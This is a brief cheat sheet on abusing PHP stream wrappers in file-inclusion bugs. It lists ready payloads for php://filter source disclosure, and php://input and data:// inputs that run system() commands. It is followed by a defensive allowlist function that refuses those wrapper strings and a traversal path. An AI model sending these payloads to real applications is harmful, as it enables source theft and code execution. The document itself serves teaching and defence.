Exploit with PHP Protocols / Wrappers

| wrapper or protocol | controllable function | allow_url_include | vulnerability type | remark |
|---|---|---|---|---|
| `file://` | - | off | LFI/File Manipulation | |
| `glob://` | - | off | Directory Traversal | |
| `php://filter/read` | include | off | File Disclosure | `php://filter/read=convert.base64-encode/resource=index.php` |
| `php://filter/write` | file_put_contents | off | Encoding | `file_put_contents("php://filter/write=string.rot13/resource=x.txt","content");` |
| `php://input` | include | on | RCE | Encoding is required while reading .php source: `<?php echo base64_encode(file_get_contents("solution.php"));?>` OR just use `<?php system('cat x.php');?>` |
| `data://` | include | on | RCE | `data:text/plain,<?php system("id")?>` OR `data:text/plain;base64,PD9waHAgc3lzdGVtKCJpZCIpPz4=` |
| `zip://` | include/uploaded file | off | RCE | |
| `phar://` | include/uploaded file | off | RCE | PHP version >= 5.3 |
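
A defensive counterpart to the table, as an added example that is not part of the original page: every row depends on user input reaching `include` or `file_put_contents` with a wrapper prefix intact, so the fix is to map the input to a server-side allowlisted file instead. The function name `resolve_page()`, the page directory and the sample inputs are assumptions made for the illustration.

```php
<?php
declare(strict_types=1);

/**
 * Map a user-supplied page name to a file that is safe to include.
 * Returns the absolute path, or null when the request must be refused.
 * resolve_page() and the directory layout are hypothetical.
 */
function resolve_page(string $name, string $baseDir): ?string
{
    // 1. Refuse anything with a scheme prefix: file://, glob://, php://,
    //    data:, zip:// and phar:// all start with "<scheme>:".
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $name)) {
        return null;
    }
    // 2. Accept only a short identifier: no slashes, dots, '#' or NUL bytes.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name)) {
        return null;
    }
    // 3. Build the path server-side and confirm it resolves inside $baseDir.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name . '.php');
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Constructed demo: a temporary page directory holding one legitimate page.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pages_demo_' . getmypid();
mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'home.php', '<?php echo "home";');

// Constructed inputs: one valid name, then wrapper forms taken from the table.
$samples = [
    'home',
    'php://filter/read=convert.base64-encode/resource=index.php',
    'php://input',
    'data:text/plain,anything',
    'zip://upload.zip#entry',
    'phar://upload.phar/entry',
    '../../etc/passwd',
];
foreach ($samples as $s) {
    printf("%-60s %s\n", $s, resolve_page($s, $dir) === null ? 'refused' : 'allowed');
}
```

Keeping `allow_url_include` off only covers the two rows marked "on" in the table; the allowlist is what stops the `php://filter`, `zip://` and `phar://` rows.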

